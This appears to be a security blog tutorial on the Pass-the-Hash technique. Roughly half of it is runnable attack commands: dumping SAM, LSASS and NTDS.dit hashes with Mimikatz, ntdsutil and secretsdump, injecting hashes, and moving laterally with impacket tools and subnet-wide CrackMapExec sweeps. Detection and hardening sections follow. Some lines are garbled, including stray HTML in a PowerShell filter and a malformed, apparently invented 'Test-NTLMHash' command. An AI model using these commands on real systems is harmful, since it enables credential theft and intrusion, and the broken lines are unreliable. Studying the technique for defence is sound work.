Listen to this Post

Introduction:
Pass-the-Hash (PtH) is a post-exploitation technique that enables attackers to authenticate to remote systems using stolen NTLM password hashes without ever cracking the plaintext password. This attack bypasses traditional password-based defenses and is a cornerstone of lateral movement in Windows-dominated networks, allowing adversaries to jump from a compromised endpoint to domain controllers, file servers, and critical infrastructure.
Learning Objectives:
- Understand the NTLM authentication flow and how PtH subverts it by replacing the password hash.
- Learn to extract NTLM hashes from SAM, LSASS, and NTDS.dit using tools like Mimikatz and Impacket.
- Apply PtH for lateral movement via SMB, WMI, and RPC, and implement detection/mitigation strategies.
You Should Know:
- Extracting NTLM Hashes – The First Step to Lateral Movement
Attackers must first obtain NTLM hashes from a compromised machine. Common sources include the local SAM registry hive (for local accounts), LSASS process memory (for logged-in domain users), and the NTDS.dit file (for all domain hashes). Below are verified extraction commands.
Step-by-step guide for local SAM (Windows):
- Run as Administrator: `reg save HKLM\SAM sam.save` and `reg save HKLM\SYSTEM system.save`
– Transfer the files to an attacker machine and use `impacket-secretsdump -sam sam.save -system system.save LOCAL`
Using Mimikatz (in-memory):
privilege::debug token::elevate lsadump::sam local SAM lsadump::lsa /inject LSASS (domain hashes)
Extracting NTDS.dit (domain controller):
– `ntdsutil “ac i ntds” “ifm” “create full c:\temp\ntds” q q` (creates a copy)
– `impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL`
Linux alternative (post-compromise via root):
Using mimikatz on Linux via Wine or using impacket's wmiexec to run commands remotely impacket-wmiexec -hashes :<ntlm_hash> domain/user@target 'reg save HKLM\SAM sam.save'
These hashes are then used without cracking – the NTLM hash itself is the credential.
2. Pass-the-Hash Using Mimikatz (Interactive & Command Line)
Mimikatz is the de facto tool for injecting a hash into the current Windows session, allowing the attacker to authenticate as the user without the password.
Step-by-step guide:
- Obtain an NTLM hash (e.g., `aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0` for a blank password or a real hash).
- Open Mimikatz as Administrator: `mimikatz.exe`
– Inject the hash: `sekurlsa::pth /user:Administrator /domain:targetdomain /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:cmd.exe`
– A new command prompt appears with the user’s token. Use `dir \\remote-pc\C$` to verify access.
Automated pass-the-hash (no interactive):
mimikatz.exe "sekurlsa::pth /user:Admin /domain:corp.local /ntlm:HASH /run:powershell.exe" exit
This technique works because Windows authentication only requires the hash to calculate the NTLM response to the server’s challenge – the plaintext password is never needed.
3. Lateral Movement with Impacket Suite (Linux)
Impacket provides Python tools for PtH without needing to inject into a local session. It’s perfect for Linux attack boxes.
Step-by-step using psexec.py:
impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 [email protected]
Using wmiexec.py for stealthier movement:
impacket-wmiexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 corp.local/[email protected]
SMBExec (executes commands via service creation):
impacket-smbexec -hashes :hash [email protected]
These tools create a semi-interactive shell. For file transfer, use `impacket-smbclient` with the same hash to access \\target\C$.
Practical scenario: After dumping a hash from a compromised workstation, run `crackmapexec smb 192.168.1.0/24 -u administrator -H hash –local-auth` to discover all machines where the hash works. Then pivot using wmiexec.
4. CrackMapExec – Mass Lateral Movement
CrackMapExec (CME) is a post‑exploitation Swiss army knife that automates PtH across entire networks.
Installation (Linux):
apt install crackmapexec or via pip: pipx install crackmapexec
Using PtH with CME:
crackmapexec smb 192.168.1.1-254 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 --shares crackmapexec smb targets.txt -u user -H hash -x "whoami" execute command crackmapexec smb targets.txt -u user -H hash -M mimikatz run mimikatz module
For domain accounts (no –local-auth):
crackmapexec smb dc.corp.local -u john -H hash -d corp.local
CME also integrates with MSSQL, SSH, WinRM, and LDAP, allowing PtH to extend beyond SMB. For WinRM (often open on servers): crackmapexec winrm 10.0.0.1 -u admin -H hash -x ipconfig.
- Detecting Pass-the-Hash Attacks with Sysmon and Windows Logs
Blue teams can detect PtH by monitoring unusual authentication patterns. Key event IDs include 4624 (successful logon) with Logon Type 3 (network) or 9 (batch), especially when the source workstation is unexpected.
Step‑by‑step detection using Sysmon (install with schema):
- Install Sysmon: `sysmon64 -accepteula -i sysmonconfig.xml` (use SwiftOnSecurity’s config)
- Look for Event ID 10 (ProcessAccess) – Mimikatz opening LSASS.exe with `GrantedAccess=0x1010` or
0x1fffff. - Monitor Event ID 4656 (Handle to LSASS requested) with suspicious call stacks.
Command to filter suspicious LSASS access:
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=10} | Where-Object {$<em>.Message -match "lsass.exe" -and $</em>.Message -match "0x1fffff"}
Network detection: PtH using SMB generates NTLM authentication without a previous Kerberos ticket. Look for Event ID 4776 (credential validation) where the workstation name doesn’t match the account’s usual source.
Windows Defender Credential Guard (enabled via Group Policy) stores hashes in a virtualized container, preventing LSASS dump. Check status: Get-WmiObject -Class Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard.
6. Mitigation: Hardening Windows Against PtH
Microsoft has released multiple mitigations. The most effective is enabling Restricted Admin Mode for RDP and Credential Guard to protect LSASS.
Step‑by‑step hardening checklist:
- Apply KB2871997 (Windows 7/2008R2) or newer OS versions – removes the ability to use PtH for local accounts (but domain accounts remain vulnerable without additional steps).
- Enable Restricted Admin Mode (RDP): Set registry key `HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin` to 0. Then connect with
mstsc.exe /restrictedadmin. - Deploy Protected Users Group – Domain members cannot use NTLM authentication; forces Kerberos.
- Disable NTLM entirely where possible via Group Policy: `Network security: Restrict NTLM: Incoming NTLM traffic` ->
Deny all accounts. - Use LAPS (Local Administrator Password Solution) to randomize local admin passwords so a hash from one machine doesn’t work on another.
- Enforce SMB Signing (prevents some PtH relay attacks):
Set-SmbServerConfiguration -RequireSecuritySignature $true.
PowerShell to check NTLM usage:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$_.Message -match "NTLM"}
- Advanced: Passing the Hash in Cloud and Hybrid Environments
In hybrid Azure AD environments, PtH can still work against on-premises synchronised identities. Attackers who compromise a hybrid server and dump hashes of synchronised accounts can move laterally to other on-prem resources, and sometimes to Azure AD Connect for password hash sync.
Step‑by‑step for hybrid hardening:
- Use Azure AD Seamless SSO – does not store hashes on the server; but if compromised, attackers can extract `AzureADSSO` token. Mitigation: rotate the `AZUREADSSOACC` account’s Kerberos decryption key.
- Enable Windows Defender System Guard for LSASS to isolate secrets from the OS.
- For cloud VMs (AWS EC2, Azure VM), disable NTLM on Windows Server images via EC2 Launch Templates or Azure Policy.
Testing PtH in a lab (educational only): On a Windows Server 2022, run `Test-NTLMHash -Hash NTHashTools).
What Undercode Say:
- Pass-the-Hash remains one of the most reliable lateral movement techniques because it abuses a fundamental design of NTLM – the hash is the credential. Even after a decade of mitigations, many organizations still have privileged accounts with NTLM enabled, making PtH a constant threat.
- Detection requires a shift from “looking for password cracking” to “monitoring LSASS access and NTLM logon patterns.” Tools like Sysmon and Windows Event Forwarding are essential, but the ultimate solution is disabling NTLM entirely – a difficult but achievable goal in modern environments.
Prediction:
As Microsoft pushes towards Kerberos-only authentication and cloud-native models (like Azure Arc and Windows 11’s “NTLM blocking” features), Pass-the-Hash will gradually lose its power inside pure cloud or modern Windows forests. However, legacy systems and hybrid setups will remain vulnerable for the next five years. Attackers will shift to token theft and Kerberoasting, but PtH will continue to be a go-to technique in environments where NTLM cannot be retired – especially in OT, healthcare, and finance sectors with mixed OS versions. Red teams must master PtH, while blue teams must prioritize NTLM disablement and Credential Guard deployment as a critical security baseline.
▶️ Related Video (86% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Lateral Movement – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


